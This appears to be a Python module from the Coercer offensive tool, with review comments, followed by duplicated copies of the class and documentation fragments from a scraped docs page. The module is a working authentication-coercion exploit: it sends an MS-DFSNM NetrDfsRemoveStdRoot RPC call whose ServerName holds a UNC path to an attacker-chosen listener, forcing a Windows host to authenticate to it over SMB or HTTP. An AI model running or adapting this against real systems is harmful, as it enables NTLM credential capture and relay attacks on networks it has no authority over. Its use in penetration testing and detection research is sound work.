coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot
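#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : NetrDfsRemoveStdRoot.py
# Author             : Podalirius (@podalirius_)
# Date created       : 14 Sep 2022
"""
Authentication-coercion method built on NetrDfsRemoveStdRoot (opnum 13) of
[MS-DFSNM], reachable over the ``\\PIPE\\netdfs`` named pipe or the
``4fc742e0-4a10-11cf-8273-00aa004ae673`` v3.0 TCP interface.

The only argument that matters is ``ServerName``: it is filled with a UNC path
that points at the Coercer listener (templates in
``NetrDfsRemoveStdRoot.exploit_paths``); ``RootShare`` and ``ApiFlags`` are
filler. From a monitoring standpoint the observable artefact is therefore an
MS-DFSNM opnum 13 request whose ServerName is a UNC path to a host of the
caller's choosing.
"""

from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from coercer.core.utils import gen_random_name
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID


class _NetrDfsRemoveStdRoot(NDRCALL):
    """
    Structure to make the RPC call to NetrDfsRemoveStdRoot() (opnum 13) in MS-DFSNM Protocol.

    ServerName and RootShare are wide strings; the callers in this file append
    the terminating NUL themselves (see ``trigger`` and ``exploit_paths``).
    """
    opnum = 13
    structure = (
        ('ServerName', WSTR),  # Type: WCHAR *  -- carries the listener UNC path
        ('RootShare', WSTR),   # Type: WCHAR *  -- random filler share name
        ('ApiFlags', DWORD)    # Type: DWORD    -- always 0 here
    )


class _NetrDfsRemoveStdRootResponse(NDRCALL):
    """
    Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol.

    NOTE(review): declared empty, so the server's return value is never
    decoded; ``trigger`` discards the reply and only reports whether the call
    raised.
    """
    structure = ()


class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    Class attributes (read by the Coercer framework):
      exploit_paths: (transport, path template) pairs; placeholders such as
        ``{{listener}}`` and ``{{rnd(8)}}`` are presumably expanded by the
        framework before ``self.path`` is set -- confirm in MSPROTOCOLRPCCALL.
      access: RPC endpoints this method can be delivered over.
      protocol / function: metadata used for listing and reporting.
    """

    # Every template ends with an explicit NUL so the WSTR field is terminated.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # NOTE(review): "ncan_np" reads like a misspelling of "ncacn_np", but it is
    # the key the framework appears to look up -- confirm before renaming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    function = {
        "name": "NetrDfsRemoveStdRoot",
        "opnum": 13,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsRemoveStdRoot request with ServerName set to ``self.path``.

        Args:
            dcerpc_session: an already-connected DCE/RPC session (``connect()``
                must have been called first).
            target: unused here; presumably kept so the signature matches the
                other method classes -- confirm against the caller.

        Returns:
            ``""`` when the request was sent and answered without raising,
            the exception object when ``dcerpc_session.request()`` raised,
            ``None`` when no session was supplied (an error line is printed).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsRemoveStdRoot()
            # self.path is the expanded exploit_paths template and presumably
            # already carries its trailing NUL.
            request['ServerName'] = self.path
            request['RootShare'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The reply is intentionally not parsed (the response structure is
            # empty); only whether the call raised matters to the caller.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad catch is deliberate: the caller appears to treat a returned
            # exception as the outcome of this attempt rather than aborting.
            return err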
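class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
    """
    Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

    Method found by:
     - [@filip_dragovic](https://twitter.com/filip_dragovic)

    Class attributes (read by the Coercer framework):
      exploit_paths: (transport, path template) pairs; placeholders such as
        ``{{listener}}`` and ``{{rnd(8)}}`` are presumably expanded by the
        framework before ``self.path`` is set -- confirm in MSPROTOCOLRPCCALL.
      access: RPC endpoints this method can be delivered over.
      protocol / function: metadata used for listing and reporting.
    """

    # Every template ends with an explicit NUL so the WSTR field is terminated.
    exploit_paths = [
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
    ]

    # NOTE(review): "ncan_np" reads like a misspelling of "ncacn_np", but it is
    # the key the framework appears to look up -- confirm before renaming.
    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\netdfs",
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
                "version": "3.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
        "shortname": "MS-DFSNM"
    }

    function = {
        "name": "NetrDfsRemoveStdRoot",
        "opnum": 13,
        "vulnerable_arguments": ["ServerName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one NetrDfsRemoveStdRoot request with ServerName set to ``self.path``.

        Args:
            dcerpc_session: an already-connected DCE/RPC session (``connect()``
                must have been called first).
            target: unused here; presumably kept so the signature matches the
                other method classes -- confirm against the caller.

        Returns:
            ``""`` when the request was sent and answered without raising,
            the exception object when ``dcerpc_session.request()`` raised,
            ``None`` when no session was supplied (an error line is printed).
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _NetrDfsRemoveStdRoot()
            # self.path is the expanded exploit_paths template and presumably
            # already carries its trailing NUL.
            request['ServerName'] = self.path
            request['RootShare'] = gen_random_name() + '\x00'
            request['ApiFlags'] = 0
            # The reply is intentionally not parsed (the response structure is
            # empty); only whether the call raised matters to the caller.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Broad catch is deliberate: the caller appears to treat a returned
            # exception as the outcome of this attempt rather than aborting.
            return err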
Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\netdfs', 'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}], 'ncacn_ip_tcp': [{'uuid': '4fc742e0-4a10-11cf-8273-00aa004ae673', 'version': '3.0'}]}
protocol =
{'longname': '[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol', 'shortname': 'MS-DFSNM'}
def
trigger(self, dcerpc_session, target):
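def trigger(self, dcerpc_session, target):
    """
    Send one NetrDfsRemoveStdRoot request with ServerName set to ``self.path``.

    Args:
        dcerpc_session: an already-connected DCE/RPC session (``connect()``
            must have been called first).
        target: unused here; presumably kept so the signature matches the
            other method classes -- confirm against the caller.

    Returns:
        ``""`` when the request was sent and answered without raising,
        the exception object when ``dcerpc_session.request()`` raised,
        ``None`` when no session was supplied (an error line is printed).
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _NetrDfsRemoveStdRoot()
        # self.path is the expanded exploit_paths template and presumably
        # already carries its trailing NUL.
        request['ServerName'] = self.path
        request['RootShare'] = gen_random_name() + '\x00'
        request['ApiFlags'] = 0
        # The reply is intentionally not parsed (the response structure is
        # empty); only whether the call raised matters to the caller.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Broad catch is deliberate: the caller appears to treat a returned
        # exception as the outcome of this attempt rather than aborting.
        return err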